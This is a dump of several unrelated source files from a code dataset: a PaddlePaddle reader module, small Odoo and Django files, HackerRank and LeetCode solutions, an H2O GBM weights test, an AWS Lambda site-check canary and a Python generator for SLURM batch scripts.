for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
if for_parallel:
main_prog_var = parallel(reader=main_prog_var)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if for_parallel:
main_prog_var = parallel(reader=main_prog_var)
return monkey_patch_reader_methods(main_prog_var)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=1,
buffer_size=None,
pass_num=1,
for_parallel=True):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
have name suffixs to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
thread_num(int): The maximal concurrent prefetch thread number.
buffer_size(int): The size of prefetch buffer.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if buffer_size is None:
buffer_size = thread_num
if isinstance(filenames, basestring):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
startup_blk.append_op(
type='open_files',
outputs={'Out': [startup_reader]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
})
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
if for_parallel:
main_prog_reader = parallel(reader=main_prog_reader)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Shuffle the reader.
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
'batching' decoration on it. When reading with the result
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def parallel(reader):
return __create_shared_decorated_reader__('create_threaded_reader', reader,
{})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_tmp_variable(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@contextlib.contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog.create_block()
yield
self.main_prog.rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self.is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in xrange(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
| [
"[email protected]"
] | |
7d95da30e61f2d12adca17c4cdd28affa68b67dc | c7d7dfa5ac23b940e852a67155364439d9069486 | /website_form_attachment/__init__.py | 668228df411b10356d3a8de52f09395638f6ead1 | [] | no_license | shurshilov/odoo | d163f6c939bcbfb36bdf83eeeeffca368f0a4722 | 8099e62254b7f1e113be7b522585dbc352aea5a8 | refs/heads/16.0 | 2023-09-04T03:02:31.427240 | 2023-09-03T16:25:28 | 2023-09-03T16:25:28 | 89,852,559 | 20 | 43 | null | 2023-09-03T06:30:22 | 2017-04-30T13:32:08 | JavaScript | UTF-8 | Python | false | false | 126 | py | # Copyright 2019 Shurshilov Artem
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import models
| [
"[email protected]"
] | |
5a931a1392b981326d9106633ad96940ac2d9671 | 8d5337e7132ae3980bda3bc0ed811207ca79b5b7 | /search/icecreamParlour.py | a61e3f9004182b4836c1f518cb20e678620a38f0 | [] | no_license | thesharpshooter/hackerrank | 16e7c565053a4d36f0a293c0f8af631cee591424 | 2cfec286e71465edd6603f6bcee608c764a086ec | refs/heads/master | 2021-07-11T09:21:57.838631 | 2017-10-06T05:22:31 | 2017-10-06T05:22:31 | 104,779,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
def get(arr,m,n):
arr = sorted([[arr[i],i] for i in range(n)],key = lambda x :x[0])
i = 0
res = [None,None]
diff = float("inf")
while i < n-1 and arr[i][0] < m:
temp = m-arr[i][0]
j = i+1
while j < n and temp-arr[j][0]>=0:
if temp-arr[j][0] < diff:
diff = temp-arr[j][0]
res[0] = arr[j][1]
res[1] = arr[i][1]
if diff == 0:
break
j += 1
i += 1
return res
t = int(raw_input())
for i in range(t):
m = int(raw_input())
n = int(raw_input())
arr = map(int,raw_input().split())
res = get(arr,m,n)
print min(res)+1,max(res)+1
| [
"[email protected]"
] | |
5f86e01d9b34bd9ecb0e5f8495151675c3e1367b | 10bf47e8efe8a6e2eb2e237c5634471ba461483b | /voting/urls.py | 8a998b355a2327ae6453160d9b047e40717c72e5 | [] | no_license | swciitg/IITG_General_Elections | d9d4001fa8b65feabc79284ae1df7d078e089712 | e35e29a1f91e07f3499a5613c091db28b2a07656 | refs/heads/master | 2020-05-06T15:31:00.797537 | 2019-04-08T08:02:41 | 2019-04-08T08:02:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | """voting URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import include, url
from . import views
urlpatterns = [
# url(r'^$',views.siteindex,name="siteindex"),
url('general_elections/', include('general_elections.urls')),
url(r'^authentication/', include('authentication.urls', namespace='authentication')),
url('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d9f83c10fa19003084ba46e89c00610f56fc49a9 | 9b4fe9c2693abc6ecc614088665cbf855971deaf | /881.boats-to-save-people.py | b1ee51a5ebe9936be3be41a07b61386d05ccc993 | [
"MIT"
] | permissive | windard/leeeeee | e795be2b9dcabfc9f32fe25794878e591a6fb2c8 | 0dd67edca4e0b0323cb5a7239f02ea46383cd15a | refs/heads/master | 2022-08-12T19:51:26.748317 | 2022-08-07T16:01:30 | 2022-08-07T16:01:30 | 222,122,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,834 | py | #
# @lc app=leetcode id=881 lang=python
#
# [881] Boats to Save People
#
# https://leetcode.com/problems/boats-to-save-people/description/
#
# algorithms
# Medium (42.90%)
# Total Accepted: 12.4K
# Total Submissions: 28.9K
# Testcase Example: '[1,2]\n3'
#
# The i-th person has weight people[i], and each boat can carry a maximum
# weight of limit.
#
# Each boat carries at most 2 people at the same time, provided the sum of the
# weight of those people is at most limit.
#
# Return the minimum number of boats to carry every given person. (It is
# guaranteed each person can be carried by a boat.)
#
#
#
#
# Example 1:
#
#
# Input: people = [1,2], limit = 3
# Output: 1
# Explanation: 1 boat (1, 2)
#
#
#
# Example 2:
#
#
# Input: people = [3,2,2,1], limit = 3
# Output: 3
# Explanation: 3 boats (1, 2), (2) and (3)
#
#
#
# Example 3:
#
#
# Input: people = [3,5,3,4], limit = 5
# Output: 4
# Explanation: 4 boats (3), (3), (4), (5)
#
# Note:
#
#
# 1 <= people.length <= 50000
# 1 <= people[i] <= limit <= 30000
#
#
#
#
#
#
class Solution(object):
def numRescueBoats(self, people, limit):
"""
:type people: List[int]
:type limit: int
:rtype: int
"""
# 两人乘船问题就是贪心算法
# 三人或更多,则是回溯加贪心算法
people.sort()
first = 0
last = len(people) - 1
times = 0
while first <= last:
if last == first:
times += 1
break
if people[first] + people[last] <= limit:
times += 1
first += 1
last -= 1
elif people[first] > limit:
times += last - first
else:
times += 1
last -= 1
return times
| [
"[email protected]"
] | |
84d04e0a67a92315abff10fcedcff85bbe31b3a0 | 9a819fc91e17ef9a44e45cf68e76cf696381d06d | /Lambda/canary.py | 03732e914a31ca284fdfaa6e38ee4352ac56a773 | [] | no_license | Gautam3994/Dark-Knight | aef1d6383e0785130db75e80ed40f544a120579e | 327b2d58851a42da1b707addea73e40fac6a61cc | refs/heads/master | 2022-12-01T11:58:39.857379 | 2020-09-05T18:07:51 | 2020-09-05T18:07:55 | 203,866,327 | 0 | 1 | null | 2022-11-24T09:16:18 | 2019-08-22T20:14:43 | Python | UTF-8 | Python | false | false | 598 | py | import requests
import os
import datetime
SITE = os.environ['site']
EXPECTED = os.environ['expected']
def validate(res):
return EXPECTED in res
def lambda_handler(event, context):
print(f"Test the site{SITE} at the time {event['time']}")
response = requests.get(url="https://www.amazon.in", headers={'User-Agent': 'AWS Lambda'})
try:
if not validate(response.text):
raise Exception("Validation failed")
except:
print("Check failed")
else:
print("okay")
finally:
print(f"Check complete at {str(datetime.datetime.now())}")
| [
"[email protected]"
] | |
3159b23be1a8a592afc5451129094bdd839623f7 | 34f6120035bfea1f675eb5dd98d59e81209d5c5e | /h2o-py/tests/testdir_algos/gbm/pyunit_weights_var_impGBM.py | 7ea27aa39c4127b00f5a8f9a0451c30aaf0009ea | [
"Apache-2.0"
] | permissive | Pure-Mind/h2o-3 | f5b5b0bf3d2856fee0719adf2754c1af719e5950 | 508ad0e28f40f537e906a372a2760ca6730ebe94 | refs/heads/master | 2021-01-17T22:56:02.372211 | 2015-08-09T02:52:34 | 2015-08-09T03:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,163 | py | import sys
sys.path.insert(1, "../../../")
import h2o
import random
def weights_var_imp(ip,port):
# Connect to h2o
h2o.init(ip,port)
def check_same(data1, data2, min_rows_scale):
gbm1_regression = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy"],
min_rows=5,
ntrees=5,
max_depth=2)
gbm2_regression = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy"],
training_frame=data2,
min_rows=5*min_rows_scale,
weights_column="weights",
ntrees=5,
max_depth=2)
gbm1_binomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy_20mpg"],
min_rows=5,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm2_binomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy_20mpg"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm1_multinomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["cylinders"],
min_rows=5,
distribution="multinomial",
ntrees=5,
max_depth=2)
gbm2_multinomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["cylinders"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="multinomial",
ntrees=5,
max_depth=2)
reg1_vi = gbm1_regression.varimp(return_list=True)
reg2_vi = gbm2_regression.varimp(return_list=True)
bin1_vi = gbm1_binomial.varimp(return_list=True)
bin2_vi = gbm2_binomial.varimp(return_list=True)
mul1_vi = gbm1_multinomial.varimp(return_list=True)
mul2_vi = gbm2_multinomial.varimp(return_list=True)
print "Varimp (regresson) no weights vs. weights: {0}, {1}".format(reg1_vi, reg2_vi)
print "Varimp (binomial) no weights vs. weights: {0}, {1}".format(bin1_vi, bin2_vi)
print "Varimp (multinomial) no weights vs. weights: {0}, {1}".format(mul1_vi, mul2_vi)
for rvi1, rvi2 in zip(reg1_vi, reg2_vi): assert rvi1 == rvi1, "Expected vi's (regression) to be the same, but got {0}, and {1}".format(rvi1, rvi2)
for bvi1, bvi2 in zip(bin1_vi, bin2_vi): assert bvi1 == bvi1, "Expected vi's (binomial) to be the same, but got {0}, and {1}".format(bvi1, bvi2)
for mvi1, mvi2 in zip(mul1_vi, mul2_vi): assert mvi1 == mvi1, "Expected vi's (multinomial) to be the same, but got {0}, and {1}".format(mvi1, mvi2)
h2o_cars_data = h2o.import_frame(h2o.locate("smalldata/junit/cars_20mpg.csv"))
h2o_cars_data["economy_20mpg"] = h2o_cars_data["economy_20mpg"].asfactor()
h2o_cars_data["cylinders"] = h2o_cars_data["cylinders"].asfactor()
# uniform weights same as no weights
weight = random.randint(1,10)
uniform_weights = [[weight] for r in range(406)]
h2o_uniform_weights = h2o.H2OFrame(python_obj=uniform_weights)
h2o_uniform_weights.setNames(["weights"])
h2o_data_uniform_weights = h2o_cars_data.cbind(h2o_uniform_weights)
print "\n\nChecking that using uniform weights is equivalent to no weights:"
check_same(h2o_cars_data, h2o_data_uniform_weights, weight)
# zero weights same as removed observations
zero_weights = [[0] if random.randint(0,1) else [1] for r in range(406)]
h2o_zero_weights = h2o.H2OFrame(python_obj=zero_weights)
h2o_zero_weights.setNames(["weights"])
h2o_data_zero_weights = h2o_cars_data.cbind(h2o_zero_weights)
h2o_data_zeros_removed = h2o_cars_data[h2o_zero_weights["weights"] == 1]
print "\n\nChecking that using some zero weights is equivalent to removing those observations:"
check_same(h2o_data_zeros_removed, h2o_data_zero_weights, 1)
# doubled weights same as doubled observations
doubled_weights = [[1] if random.randint(0,1) else [2] for r in range(406)]
h2o_doubled_weights = h2o.H2OFrame(python_obj=doubled_weights)
h2o_doubled_weights.setNames(["weights"])
h2o_data_doubled_weights = h2o_cars_data.cbind(h2o_doubled_weights)
doubled_data = h2o.as_list(h2o_cars_data, use_pandas=False)
colnames = doubled_data.pop(0)
for idx, w in enumerate(doubled_weights):
if w[0] == 2: doubled_data.append(doubled_data[idx])
h2o_data_doubled = h2o.H2OFrame(python_obj=doubled_data)
h2o_data_doubled.setNames(colnames)
h2o_data_doubled["economy_20mpg"] = h2o_data_doubled["economy_20mpg"].asfactor()
h2o_data_doubled["cylinders"] = h2o_data_doubled["cylinders"].asfactor()
h2o_data_doubled_weights["economy_20mpg"] = h2o_data_doubled_weights["economy_20mpg"].asfactor()
h2o_data_doubled_weights["cylinders"] = h2o_data_doubled_weights["cylinders"].asfactor()
print "\n\nChecking that doubling some weights is equivalent to doubling those observations:"
check_same(h2o_data_doubled, h2o_data_doubled_weights, 1)
if __name__ == "__main__":
h2o.run_test(sys.argv, weights_var_imp)
| [
"[email protected]"
] | |
5a792baad7875ecfd9cb09eb33eff687dbab1295 | 1699300e1225f0994fbfd5e13a7eb4436a5df14d | /03_SC_Track/02_Original_V_624_Joho/Make_SLURM_submission_script.py | 6ff6b2d5f59e75247f2e258efde560ac32922702 | [
"MIT"
] | permissive | HaroonRafique/PyORBIT_MD4224 | 26307a60ed79f3e170fbd655eb8cbe8cc9a0dfa9 | 6f68a80b2f8bf1cbeb9e2fc840925efe8a8b5672 | refs/heads/master | 2023-04-25T13:27:49.756836 | 2020-08-25T10:26:07 | 2020-08-25T10:26:07 | 215,249,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,313 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '03_02'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
| [
"[email protected]"
] | |
